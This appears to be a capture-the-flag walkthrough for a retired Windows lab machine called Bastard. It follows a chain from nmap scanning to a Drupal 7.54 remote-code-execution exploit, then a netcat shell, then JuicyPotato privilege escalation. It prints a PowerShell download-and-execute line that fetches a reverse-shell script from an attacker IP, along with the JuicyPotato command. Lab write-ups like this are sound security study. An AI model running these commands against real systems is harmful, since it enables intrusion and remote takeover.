Bastard machine is a vulnerable machine with windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Clasic Scan
Full port Scan
As a result of port scanning, “80/tcp http IIS httpd 7.5, 135/tcp msrp Windows RPC, 49154/tcp msrpc Windows RPC” ports are open.
We provide enumeration over port 80.
We encountered a drupal cms that offers admin passord, we tried default passwords but we were not successful. We checked the saturas given by Nmap and saw the version number in the /CHANGELOG.txt directory
We saw it was 7.54, so let’s see if there’s a vulnerability with that.
Searchsploit found
There is an RCE vulnerability, we prefer not to be authenticated because we still haven’t found any credential information at the moment.
I’m trying to exploit this vulnerability on my own machine.
We edited this line according to what we wanted.
But when we tried to run this exploit we got an error
Let’s search for exploits on Github
We dowloand this and used it
Let’s run it on the target we have seen its usage
Here we were able to run the whoami command.
Now let’s try to install and run nc to give us an interactive Shell
We’ve installed nc on the target
Then we ran nc.exe and it gave us Shell
Here we have obtained the user flag but we cannot access the administrator folder
Here we enumerate local to get the root flag.
We understand that there is a JuicyPotato appetizer here.
We pass JuicyPotato.exe and Shell.bat to the target machine
Shell.bat includes (powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1’)”)
We write
Then we pass it on.
Then run JuicyPotato.exe
.\JuicyPotato.exe -t * -p shell.bat -l 5555 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
We write, we run, Shell comes on port 4723, which we listen with nc
Now we get the root flag